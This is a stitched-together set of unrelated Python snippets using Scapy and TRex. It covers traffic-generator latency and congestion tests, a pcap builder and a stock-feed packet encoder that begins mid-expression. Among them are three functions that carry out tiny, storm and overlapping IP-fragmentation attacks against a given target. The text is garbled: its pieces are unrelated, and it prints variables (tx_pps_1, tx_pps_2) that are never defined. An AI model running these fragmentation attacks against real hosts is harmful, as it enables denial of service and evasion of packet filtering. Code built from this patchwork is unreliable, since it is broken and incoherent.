def get_sample_packet(self, pkt_type): if pkt_type == "tcp": return Ether() / IP(src=SOURCE_IP, dst=DEST_IP) / TCP() / ("*" * 1500) elif pkt_type == "gtpu-udp": return (Ether() / IP(src=SOURCE_IP, dst=DEST_IP) / UDP() / GTPU() / IP() / UDP() / ("*" * 1500)) else: return Ether() / IP(src=SOURCE_IP, dst=DEST_IP) / UDP() / ("*" * 1500)
def TinyFragmentAttack(Ip, Interface, PckNmb): for p in fragment(IP(dst=Ip, flags="MF", id=222) / UDP() / Raw(load="abcdefgh" * PckNmb), fragsize=1): send(p, iface=Interface, verbose=0) p.frag += 1 p.flags = 0 send(p, iface=Interface, verbose=0) return 0
def StormFragmentAttack(Ip, Interface, PckNmb): for p in fragment( IP(dst=Ip, flags="MF", id=222) / UDP() / Raw(load="a" * 1472 * PckNmb)): send(p, iface=Interface, verbose=0) p.frag += 185 p.flags = 0 send(p, iface=Interface, verbose=0) return 0
def TinyOverlappingFragmentAttack(Ip, Interface, PckNmb): for p in fragment(IP(dst=Ip, flags="MF", id=222) / UDP(dport=80) / Raw(load="abcdefgh" * PckNmb), fragsize=3): p.frag -= 1 send(p, iface=Interface, verbose=0) p.frag += 1 p.flags = 0 send(p, iface=Interface, verbose=0) return 0
def start(self, args) -> None: pkt = ( Ether(src=SOURCE_MAC, dst=DEST_MAC) / IP(src=SOURCE_IP, dst=DEST_IP) / UDP() / ("*" * 1500) ) stream = STLStream(packet=STLPktBuilder(pkt=pkt, vm=[]), mode=STLTXCont()) logging.info("Setting up ports") self.client.add_streams(stream, ports=SENDER_PORTS) pkt_capture_limit = args.duration * 3 logging.info( "Start capturing first %s RX packet from INT collector", pkt_capture_limit ) self.client.set_service_mode(ports=INT_COLLECTPR_PORTS, enabled=True) capture = self.client.start_capture( rx_ports=INT_COLLECTPR_PORTS, limit=pkt_capture_limit, bpf_filter="udp and dst port 32766", ) logging.info( "Starting traffic, duration: %ds, throughput: 100%%", args.duration ) self.client.start(ports=SENDER_PORTS, mult="100%", duration=args.duration) logging.info("Waiting until all traffic stop") self.client.wait_on_traffic(ports=SENDER_PORTS) logging.info("Stop capturing packet from INT collector port") output = "/tmp/congestion-report-{}.pcap".format( datetime.now().strftime("%Y%m%d-%H%M%S") ) self.client.stop_capture(capture["id"], output) analysis_report_pcap(output) list_port_status(self.client.get_stats())
def start(self, args: dict) -> None: # create packets pkt1 = Ether(dst=DEST_MAC) / IP(src="16.0.0.1", dst="48.0.0.1") / UDP( dport=12, sport=1025) / ("*" * 1500) pkt2 = Ether(dst=DEST_MAC) / IP(src="16.0.0.2", dst="48.0.0.2") / UDP( dport=12, sport=1025) / ("*" * 1500) pkt3 = Ether(dst=DEST_MAC) / IP(src="16.0.0.3", dst="48.0.0.3") / UDP( dport=12, sport=1025) / ("*" * 1500) #stream list streams = [] # Create a traffic stream # assume s1 is a delay critical stream with QoS s1 = STLStream(packet=STLPktBuilder(pkt=pkt1), mode=STLTXCont(percentage=1), flow_stats=STLFlowLatencyStats(pg_id=1)) # assume s2 is a delay critical stream without QoS s2 = STLStream(packet=STLPktBuilder(pkt=pkt2), mode=STLTXCont(percentage=1), flow_stats=STLFlowLatencyStats(pg_id=2)) # assume s3 is a lower priority stream s3 = STLStream(packet=STLPktBuilder(pkt=pkt3), mode=STLTXCont(percentage=98), flow_stats=STLFlowLatencyStats(pg_id=3)) # prepare ports self.client.reset(ports=[0, 1]) # add sterams streams.append(s1) streams.append(s2) streams.append(s3) self.client.add_streams(streams, ports=[0]) logging.info( "Starting traffic, duration: %d sec", args.duration, ) # Start sending traffic self.client.start(SENDER_PORT, mult="100%", duration=args.duration) pgids = self.client.get_active_pgids() logging.info("Waiting until all traffic stop") self.client.wait_on_traffic(ports=SENDER_PORT) # stats for pg_id 1 and 2 stats = self.client.get_pgid_stats(pgids['latency']) flow_stats_1 = stats['flow_stats'].get(1) flow_stats_2 = stats['flow_stats'].get(2) global_lat_stats = stats['latency'] lat_stats_1 = global_lat_stats.get(1) lat_stats_2 = global_lat_stats.get(2) tx_pkts_1 = flow_stats_1['tx_pkts'].get(0, 0) rx_pkts_1 = flow_stats_1['rx_pkts'].get(1, 0) drops_1 = lat_stats_1['err_cntrs']['dropped'] tx_pkts_2 = flow_stats_2['tx_pkts'].get(0, 0) rx_pkts_2 = flow_stats_2['rx_pkts'].get(1, 0) drops_2 = lat_stats_2['err_cntrs']['dropped'] print( " \n TX and RX flow stats and packets dropped for s1 (i.e., delay critical): " ) print(" tx packets: {0}".format(tx_pkts_1)) print(" tx bytes : {0}".format(tx_pps_1)) print(" rx packets : {0}".format(rx_pkts_1)) print(" drops: {0}".format(drops_1)) print( " \n TX and RX flow stats and packets dropped for s2 (i.e., delay critical): " ) print(" tx packets: {0}".format(tx_pkts_2)) print(" tx bytes : {0}".format(tx_pps_2)) print(" rx packets : {0}".format(rx_pkts_2)) print(" drops: {0}".format(drops_2)) # latency info for s1 lat_1 = lat_stats_1['latency'] avg_1 = lat_1['average'] tot_max_1 = lat_1['total_max'] tot_min_1 = lat_1['total_min'] # latency info for s2 lat_2 = lat_stats_2['latency'] avg_2 = lat_2['average'] tot_max_2 = lat_2['total_max'] tot_min_2 = lat_2['total_min'] print('\n Latency info for s1 (ie., delay critical with QoS):') print(" Maximum latency(usec): {0}".format(tot_max_1)) print(" Minimum latency(usec): {0}".format(tot_min_1)) print(" Average latency(usec): {0}".format(avg_1)) print('\n Latency info for s2 (ie., delay critical without QoS):') print(" Maximum latency(usec): {0}".format(tot_max_2)) print(" Minimum latency(usec): {0}".format(tot_min_2)) print(" Average latency(usec): {0}".format(avg_2)) # max latency difference between delay critcal streams s1 and s2 dc_max_lat_diff = tot_max_2 - tot_max_1 assert ((LATENCY_LP_MAX_USEC - LATENCY_DC_MAX_USEC) <= dc_max_lat_diff), \ "Priority scheduling test failed." # Get statistics for TX and RX ports stats = self.client.get_stats() readable_stats_0 = get_readable_port_stats(stats[0]) readable_stats_1 = get_readable_port_stats(stats[1]) logging.info("Priority scheduling test successfully executed.") print("\n Overall Statistics for TX port: \n") print(readable_stats_0) print("\n Overall Statistics for RX port: \n") print(readable_stats_1)
'00').decode("hex") if five_sell_price >= 1000: five_sell_price_pkt = (five_sell_price_str + '00').decode("hex") elif five_sell_price < 1000 and five_sell_price >= 100: five_sell_price_pkt = ('0' + five_sell_price_str + '00').decode("hex") elif five_sell_price < 100 and five_sell_price >= 10: five_sell_price_pkt = ('00' + five_sell_price_str + '00').decode("hex") elif five_sell_price < 10: five_sell_price_pkt = ('000' + five_sell_price_str + '00').decode("hex") pkt = (Ether(src=src_mac_addr, dst=dst_mac_addr) / IP(src=src_ip_addr, dst=dst_ip_addr) / UDP(sport=ip_sport_no, dport=ip_dport_no) / format_six_esc_code_string / payload_len_str / format_six_type_string / format_six_string / format_six_version_string / format_six_seq_num_string / format_six_stock_id / format_six_transction_time_final_string / for_mat_six_ob / for_mat_six_ud_string / for_mat_six_state_string / for_mat_six_Qty_pkt / one_buy_price_pkt / one_buy_Qty_pkt / two_buy_price_pkt / two_buy_Qty_pkt / three_buy_price_pkt / three_buy_Qty_pkt / four_buy_price_pkt / four_buy_Qty_pkt / five_buy_price_pkt / five_buy_Qty_pkt / one_sell_price_pkt / one_sell_Qty_pkt / two_sell_price_pkt / two_sell_Qty_pkt / three_sell_price_pkt / three_sell_Qty_pkt / four_sell_price_pkt / four_sell_Qty_pkt / five_sell_price_pkt / five_sell_Qty_pkt / checksum / terminalcode) pkt.time = pkt_timestamp
for i in range(int(pkt_length)): payload_data = payload_data + 'A' # Payload contents are not important. pkts_tcp = [] #A simple TCP/IP packet embedded in an Ethernet II frame for i in range(int(no_pkt)): pkt = (Ether(src=src_mac_addr, dst=dst_mac_addr) / IP(src=src_ip_addr, dst=dst_ip_addr) / TCP(sport=ip_sport_no, dport=ip_dport_no) / payload_data) pkts_tcp.append(pkt) pkts_udp = [] #A simple UDP/IP packet embedded in an Ethernet frame for i in range(int(no_pkt)): pkt = (Ether(src=src_mac_addr, dst=dst_mac_addr) / IP(src=src_ip_addr, dst=dst_ip_addr) / UDP(sport=ip_sport_no, dport=ip_dport_no) / payload_data) pkt.time = pkt_timestamp pkts_udp.append(pkt) if (args.packet_type == 'tcp' or args.packet_type == 'TCP'): pkts = pkts_tcp else: pkts = pkts_udp #Select packet type for axi stream data generation wrpcap(os.path.join(script_dir, '%s.cap' % (str(pcap_name))), pkts) print '\nFinish packet generation!\n'